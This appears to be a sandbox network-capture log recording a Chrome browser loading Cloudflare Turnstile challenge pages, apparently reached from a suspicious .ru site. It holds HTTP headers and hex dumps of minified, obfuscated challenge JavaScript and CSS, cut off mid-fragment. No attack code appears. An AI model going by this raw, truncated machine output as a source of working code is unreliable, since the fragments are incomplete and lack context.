                                          2025-01-08 15:13:28 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                          Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                          2025-01-08 15:13:28 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                          Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                          2025-01-08 15:13:28 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                          Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                          2025-01-08 15:13:28 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                          Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.549726104.18.94.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:28 UTC798OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/ HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-Dest: iframe
                                          Referer: https://rixolo.trilivar.ru/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:28 UTC1362INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Content-Length: 26636
                                          Connection: close
                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                          cross-origin-embedder-policy: require-corp
                                          cross-origin-opener-policy: same-origin
                                          cross-origin-resource-policy: cross-origin
                                          origin-agent-cluster: ?1
                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                          referrer-policy: same-origin
                                          document-policy: js-profiling
                                          2025-01-08 15:13:28 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 64 32 31 62 36 66 64 36 36 63 33 34 33 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                          Data Ascii: Server: cloudflareCF-RAY: 8fed21b6fd66c343-EWRalt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:28 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                          2025-01-08 15:13:28 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                          2025-01-08 15:13:28 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                          2025-01-08 15:13:28 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                          2025-01-08 15:13:28 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                          2025-01-08 15:13:28 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                          2025-01-08 15:13:28 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                          2025-01-08 15:13:28 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                          2025-01-08 15:13:28 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.549728104.18.94.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:28 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fed21b6fd66c343&lang=auto HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:28 UTC331INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:28 GMT
                                          Content-Type: application/javascript; charset=UTF-8
                                          Content-Length: 116676
                                          Connection: close
                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          Server: cloudflare
                                          CF-RAY: 8fed21bbab505e86-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:28 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                          2025-01-08 15:13:28 UTC1369INData Raw: 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32
                                          Data Ascii: ser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%2
                                          2025-01-08 15:13:28 UTC1369INData Raw: 66 4b 2c 66 56 2c 66 5a 2c 67 30 2c 67 33 2c 67 34 2c 67 44 2c 67 48 2c 67 31 2c 67 32 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 31 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 33 38 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 34 37 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 33 34 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 38 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 30 39 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 39 33 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28
                                          Data Ascii: fK,fV,fZ,g0,g3,g4,gD,gH,g1,g2){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1011))/1+parseInt(gI(938))/2*(parseInt(gI(1347))/3)+-parseInt(gI(1234))/4*(parseInt(gI(568))/5)+-parseInt(gI(809))/6+-parseInt(gI(393))/7*(-parseInt(gI(
